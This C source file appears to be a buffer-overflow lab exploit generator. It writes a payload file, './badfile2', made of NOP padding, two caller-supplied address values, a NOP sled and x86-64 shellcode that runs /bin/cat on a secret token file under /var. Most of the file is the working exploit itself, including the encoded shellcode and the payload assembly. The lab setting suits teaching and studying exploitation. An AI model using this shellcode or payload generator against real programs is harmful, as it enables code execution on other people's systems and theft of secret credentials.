#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
"\x48\x31\xc0" /* xor rax,rax */
"\x50" /* push rax */
"\x48\xbb\x2f\x2f\x2f\x74\x6f\x6b\x65\x6e" /* mov rbx,0x6e656b6f742f2f2f */
"\x53" /* push rbx */
"\x48\xbb\x73\x65\x63\x72\x65\x74\x2f\x2f" /* mov rbx,0x2f2f746572636573 */
"\x53" /* push rbx */
"\x48\xbb\x2f\x76\x61\x72\x2f\x2f\x2f\x2f" /* mov rbx,0x2f2f2f2f7261762f */
"\x53" /* push rbx */
"\x48\x89\xe1" /* mov rcx,rsp */
"\x50" /* push rax */
"\x48\xbb\x2f\x62\x69\x6e\x2f\x63\x61\x74" /* mov rbx,0x7461632f6e69622f */
"\x53" /* push rbx */
"\x48\x89\xe7" /* mov rdi,rsp */
"\x50" /* push rax */
"\x51" /* push rcx */
"\x57" /* push rdi */
"\x48\x89\xe6" /* mov rsi,rsp */
"\xb0\x3b" /* mov al,0x3b */
"\x0f\x05" /* syscall */
;
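/*
 * Write the lab input file "./badfile2".
 *
 * Usage: <prog> <pad_len> <value1> <value2>
 *
 *   pad_len  number of 0x90 padding bytes written first (0..sizeof garbage)
 *   value1   unsigned long written verbatim after the padding
 *   value2   unsigned long written verbatim after value1
 *
 * File layout, in order: pad_len bytes of 0x90, value1, value2, a 160-byte
 * block of 0x90, then the bytes of shellcode[] up to its terminating NUL.
 *
 * Returns EXIT_SUCCESS when the whole file was written, EXIT_FAILURE on a
 * usage error, an out-of-range pad_len, or any I/O failure.
 *
 * The original dereferenced argv[1..3] without checking argc and passed
 * atoi(argv[1]) straight to memset(), so a length above 1000 (or a negative
 * one, converted to a huge size_t) overran the local garbage[] array of this
 * generator itself. Those inputs are now rejected before any buffer is
 * touched, and fopen/fwrite/fputs/fclose results are checked.
 */
int main(int argc, char **argv)
{
    char garbage[1000]; /* padding written ahead of the two words */
    char buffer[160];
    FILE *badfile;
    char *end;
    long pad_len;
    unsigned long value;
    unsigned long value2;
    int ok;

    if (argc < 4) {
        fprintf(stderr, "usage: %s <pad_len> <value1> <value2>\n",
                argc > 0 ? argv[0] : "client_exploit");
        return EXIT_FAILURE;
    }

    /* Base 10 matches the atoi() call this replaces. An out-of-range string
     * makes strtol() return LONG_MIN/LONG_MAX, both rejected by the bounds. */
    pad_len = strtol(argv[1], &end, 10);
    if (end == argv[1] || *end != '\0' ||
        pad_len < 0 || (size_t)pad_len > sizeof garbage) {
        fprintf(stderr, "pad_len must be an integer in 0..%zu\n",
                sizeof garbage);
        return EXIT_FAILURE;
    }

    /* Base 0 keeps the original behaviour: decimal, 0x-hex or 0-octal. */
    value = strtoul(argv[2], &end, 0);
    if (end == argv[2] || *end != '\0') {
        fprintf(stderr, "value1 is not a number: %s\n", argv[2]);
        return EXIT_FAILURE;
    }
    value2 = strtoul(argv[3], &end, 0);
    if (end == argv[3] || *end != '\0') {
        fprintf(stderr, "value2 is not a number: %s\n", argv[3]);
        return EXIT_FAILURE;
    }

    memset(garbage, 0x90, (size_t)pad_len);
    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(buffer, 0x90, sizeof buffer);
    /* TODO Fill the buffer with appropriate contents here */

    /* Save the contents to the file "./badfile2" */
    badfile = fopen("./badfile2", "w");
    if (badfile == NULL) {
        perror("./badfile2");
        return EXIT_FAILURE;
    }

    ok = fwrite(garbage, 1, (size_t)pad_len, badfile) == (size_t)pad_len
      && fwrite(&value, sizeof(value), 1, badfile) == 1
      && fwrite(&value2, sizeof(value2), 1, badfile) == 1
      && fwrite(buffer, sizeof buffer, 1, badfile) == 1
      /* fputs stops at the first NUL, so this relies on shellcode[]
       * containing no zero byte before its terminator. */
      && fputs(shellcode, badfile) != EOF;

    /* fclose flushes buffered data; a failure here means a short file. */
    if (fclose(badfile) != 0) {
        ok = 0;
    }
    if (!ok) {
        fprintf(stderr, "failed to write ./badfile2\n");
        return EXIT_FAILURE;
    }
    return EXIT_SUCCESS;
}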